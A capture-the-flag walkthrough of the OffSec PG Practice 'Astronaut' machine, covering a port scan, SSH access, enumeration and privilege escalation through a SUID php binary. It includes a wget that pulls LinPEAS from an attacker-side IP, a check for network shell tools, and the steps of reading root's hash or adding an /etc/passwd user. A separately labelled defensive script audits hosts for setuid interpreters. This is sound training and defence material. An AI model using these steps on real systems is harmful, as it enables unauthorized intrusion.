Astronaut Walkthrough
Platform: Offsec | PG Practice
Difficulty: Easy
OS: Linux
Author: Pawan Kumar (Vulntricks)
Date: [04/07/2025]
1. Reconnaissance
Quick Scan using RustScan
└─$ rustscan -a $IP
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 61
80/tcp open http syn-ack ttl 61
2. Initial Access
The machine already provides credentials.
Use them to log in over SSH:
└─$ ssh alex@$IP
alex@gravity:~$ whoami
alex
3. Post-Exploitation Enumeration
Checking Capabilities
This helps in deciding which commands can be used.
for cmd in gcc cc python perl python3 python2 wget curl fetch nc ncat nc.traditional socat; do which $cmd >/dev/null 2>&1 && echo "[+] $cmd: $(which $cmd)" || echo "[-] $cmd: Not found"; done
Download LinPEAS for enumeration:
alex@gravity:~$ wget http://192.168.45.224/linpeas.sh
--2025-07-03 17:38:49-- http://192.168.45.224/linpeas.sh
Connecting to 192.168.45.224:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 862779 (843K) [text/x-sh]
Saving to: ‘linpeas.sh.1’
linpeas.sh.1 100%[=======================================================>] 842.56K 453KB/s in 1.9s
2025-07-03 17:38:51 (453 KB/s) - ‘linpeas.sh.1’ saved [862779/862779]
4. Privilege Escalation
Looking through the LinPEAS results,
we find this interesting SUID php binary.
Searching GTFOBins turns up this php privilege escalation vector.
However, it cannot be executed, as alex doesn't have sudo permissions on it.
We can still try to read and write files without root user capabilities.
Bingo!
We can read a sensitive file, and we now have the hash of the root user. There are two options: either crack the user's password, or add a new user to the /etc/passwd file and SSH in as that user. Cracking the password can be tedious work and is not always successful.
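From the defender's side, the root cause here is an interpreter carrying the setuid bit, and that is easy to audit for. The script below is an added example, not part of the original walkthrough; it generalizes from php to other interpreters and shells, and its function names and interpreter name list are assumptions.

```shell
#!/bin/sh
# Added example (not from the walkthrough): flag interpreters that carry the setuid bit.
# Function names and the interpreter name list are assumptions for illustration.

# is_interpreter NAME: succeed when NAME looks like a script interpreter or shell.
is_interpreter() {
    case "$1" in
        php*|python*|perl*|ruby*|lua*|node|bash|dash|sh|zsh|ksh) return 0 ;;
        *) return 1 ;;
    esac
}

# audit_suid_interpreters DIR...: print every setuid regular file under the given
# directories whose basename matches is_interpreter, one path per line.
audit_suid_interpreters() {
    find "$@" -xdev -type f -perm -4000 2>/dev/null |
    while IFS= read -r path; do
        if is_interpreter "$(basename "$path")"; then
            printf '%s\n' "$path"
        fi
    done
}

# check_host DIR...: report findings with the fix; return 1 when anything is flagged.
check_host() {
    findings=$(audit_suid_interpreters "$@")
    if [ -z "$findings" ]; then
        return 0
    fi
    printf '%s\n' "$findings" | while IFS= read -r f; do
        printf 'FINDING: setuid interpreter %s (remediate: chmod u-s %s)\n' "$f" "$f"
    done
    return 1
}

# Scan only when directories are passed, e.g.: sh audit.sh /usr /opt
if [ "$#" -gt 0 ]; then
    check_host "$@"
fi
```

The non-zero return from check_host makes it usable as a scheduled job or build-image gate that fails when a setuid interpreter appears.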
5. Root Flag
The flag can be read directly using the exploit above.